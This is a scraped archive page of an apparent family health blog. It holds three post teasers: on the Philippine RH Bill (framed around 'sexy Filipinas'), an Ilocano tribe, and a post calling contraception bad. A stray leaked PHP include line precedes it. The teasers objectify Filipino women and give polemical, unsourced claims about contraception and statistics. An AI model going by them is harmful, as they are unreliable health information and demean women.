@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); General Health Archives - Page 3 of 175 - My Family Health Blog

Category: General Health

RH Bill Revealing Statistics and Sexy Filipinas

If you think those pictures of Filipinas on Google Images today in 2012 are too sexy for their own reproductive good… imagine how much sexier our grand mothers were in the 1960s… RH Bill 2012… aka Responsible Parenthood… aka Population Control… because the main idea, the thesis is that...

Ilocano Native Tribe of Tabuk Mountain are Built Tough and Strong

I sent my Ilocano driver Oliver to his second cousin to find a steady source of deer meat and wild pig meat. There Oliver met at the foot of Mount Tabuk members of an Ilocano Native Tribe. They spoke to him in deep Ilocano language. If we are to...

Contraception Obama 2012: Atheists and Real Healers Think Contraception Sucks

Well well well.  Obama’s reproductive health care insurance cramming down the throats of everyone in the USA got the religious people riled up.  Those Catholics suddenly remembered it’s in their official doctrine that contraception is all bad… and they had been sleeping on the job… losing allegedly 98% of...